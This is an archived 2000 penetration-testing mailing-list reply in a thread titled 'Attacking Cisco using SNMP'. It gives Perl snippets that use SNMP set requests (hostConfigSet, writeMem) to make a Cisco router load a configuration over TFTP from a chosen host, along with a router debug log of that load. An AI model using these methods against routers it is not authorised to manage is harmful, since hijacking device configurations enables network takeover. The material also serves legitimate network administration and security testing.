Penetration Testing mailing list archives
Re: [PEN-TEST] Attacking Cisco using SNMP
From: "Teicher, Mark" <mark.teicher () NETWORKICE COM>
Date: Tue, 28 Nov 2000 19:46:41 +0100
Never quite could get it to work correctly.. But anyways, here are some
code snippets and packet captures to help you out..
You have to remember some of us know very little about SNMP_set and how it
can be utilized to manage large enterprise networks. (biting tongue -:)
sub snmp_raw_set
{
local($nr,$request) = @_;
local($w1,$r2,$resp,@ret,@info);
$w1 = "wh10" . $nr;
$r2 = "rh20" . $nr;
print $w1 ">$request\n";
# The next line is unneeded, if uncommented will cause wrong error code to be
# generated.
# $resp = <$r2>;
print $w1 "?\n";
$resp = <$r2>; # should give return code
if (isError($resp)) { return 0; };
return substr($resp,2);
}
1;
*Mar 1 03:41:54.875 PST: TFTP: Sending read request
*Mar 1 03:41:54.879 PST: UDP: sent src=192.168.55.121(6608),
dst=192.168.55.188
(69), length=60
*Mar 1 03:41:54.879 PST: IP: s=192.168.55.121 (local), d=192.168.55.188
(Ethern
et0), len 60, sending
*Mar 1 03:42:01.543 PST: IP ARP: rcvd req src 192.168.55.188
0800.20b6.07c5, dst 192.168.55.120 Ethernet0
*Mar 1 03:42:01.567 PST: IP ARP: rcvd req src 192.168.55.188
0800.20b6.07c5, dst 192.168.55.120 Ethernet0
*Mar 1 03:42:01.891 PST: SNMP: Response, reqid 2, errstat 5, erridx 1
lsystem.53.192.168.55.188 = /cisco/ironlung-config
*Mar 1 03:42:01.919 PST: SNMP: Packet sent via UDP to 192.168.55.188
*Mar 1 03:42:01.923 PST: UDP: sent src=192.168.55.121(161),
dst=192.168.55.188(33345), length=96
*Mar 1 03:42:01.927 PST: IP: s=192.168.55.121 (local), d=192.168.55.188
(Ethernet0), len 96, sending
*Mar 1 03:42:01.935 PST: IP: s=192.168.55.188 (Ethernet0),
d=192.168.55.121 (Ethernet0), len 112, rcvd 3
*Mar 1 03:42:01.939 PST: ICMP: dst (192.168.55.121) port unreachable rcv
from 192.168.55.188
*Mar 1 03:42:01.943 PST: SNMP: Packet received via UDP from 192.168.55.188
on Ethernet0
*Mar 1 03:42:01.951 PST: SNMP: Set request, reqid 2, errstat 0, erridx 0
lsystem.53.192.168.55.188 = /cisco/ironlung-configg
*Mar 1 03:42:01.971 PST: %SYS-4-SNMP_HOSTCONFIGSET: SNMP hostConfigSet
request.
Loading configuration from 192.168.55.188.
*Mar 1 03:42:01.999 PST: SNMP: Queuing packet to 192.168.55.188
*Mar 1 03:42:01.999 PST: SNMP: V1 Trap, ent ciscoConfigManMIB.2, addr
192.168.55.121, gentrap 6, spectrap 1
ccmHistoryEventEntry.3.58 = 2
ccmHistoryEventEntry.4.58 = 6
ccmHistoryEventEntry.5.58 = 3
Cisco Internetwork Operating System Software IOS (tm) 2500 Software
(C2500-IS56-L), Version 11.2(8), RELEASE SOFTWARE (fc1) Copyright (c)
1986-1997 by cisco Systems, Inc. Compiled Tue 05-Aug-97 09:07 by ckralik
Image text-base: 0x00001448, data-base: 0x00561104
ROM: System Bootstrap, Version 4.14(9.1), SOFTWARE
ironlung uptime is 2 weeks, 13 hours, 19 minutes
System restarted by power-on
System image file is "c2500-is56-l.112-8.Z", booted via flash
Host configuration file is "/cisco/ironlung-confg", booted via tftp from
192.168.55.188
cisco 2500 (68030) processor (revision D) with 16384K/2048K bytes of memory.
Processor board ID 01560898, with hardware revision 00000000
Bridging software.
Snmpset is an SNMP application that uses the SET Request to set
information on a network entity. One or more fully qualified object
identifiers must be given as arguments on the command line. A type and a
value to set must accompany each object identifier. Each variable name
is given in the format specified in variables.
If the network entity has an error processing the request packet, an error
packet will be returned and a message will be shown, helping to
pinpoint in what way the request was
malformed. If there were other variables in the request, the
request will be resent without the bad variable.
sub confActions
{
my($tftpHost, $pathName, $initHost, $comm) = @_;
postMessages("confActions($tftpHost, $pathName,
$initHost, $comm)", $LOGDBG);
if ($tftpHost eq $initHost) {
postMessages(">>>> tftpHost = router: $initHost
<<<<",$LOGERR);
return;
}
if (!openSNMP($initHost, $comm)) {
postMessages("$initHost\:", $LOGDBS);
if ($ConfFlag == $ConfRead ||
$ConfFlag == $ConfLoad) {
$v = "hostConfigSet\[$tftpHost\]=\"$pathName\"";
$results = &snmp_set($COMMPORT, $v);
postMessages("\tsnmp_set($COMMPORT, $v)=$results",
$LOGDBS);
}
if ($ConfFlag == $ConfWrite ||
$ConfFlag == $ConfLoad) {
$v = "writeMem=1";
$results = &snmp_set($COMMPORT, $v);
postMessages("\tsnmp_set($COMMPORT, $v)=$results",
$LOGDBS);
}
closeSNMP();
}
postMessages("confActions exits", $LOGDBG);
}
At 08:37 AM 11/29/00 +0800, David Taylor wrote:
On Tue, 28 Nov 2000, Fabio Pietrosanti (naif) wrote: > [snip] > Does someone ever used snmpset to upload and/or download configuration > file from a cisco ios 12 with new system mib ? Fabio, I haven't had a need to do this (yet), but the Cisco v2 MIBS include quite a bit of in-line documentation on how this would be done. See the URL below for the relevant MIB... ftp://ftp.cisco.com/pub/mibs/v2/CISCO-CONFIG-COPY-MIB.my Regards, Dave Taylor
Current thread:
- [PEN-TEST] Attacking Cisco using SNMP Fabio Pietrosanti (naif) (Nov 29)
- [PEN-TEST] ftp etc/passwd Seth Georgion (Nov 29)
- Re: [PEN-TEST] ftp etc/passwd cdowns (Nov 29)
- Re: [PEN-TEST] ftp etc/passwd Bill Weiss (Nov 29)
- Re: [PEN-TEST] ftp etc/passwd Alan Olsen (Nov 29)
- Re: [PEN-TEST] Attacking Cisco using SNMP David Taylor (Nov 29)
- Message not available
- Re: [PEN-TEST] Attacking Cisco using SNMP Teicher, Mark (Nov 29)
- [PEN-TEST] ftp etc/passwd Seth Georgion (Nov 29)
- <Possible follow-ups>
- Re: [PEN-TEST] Attacking Cisco using SNMP Todd Garrison (Nov 30)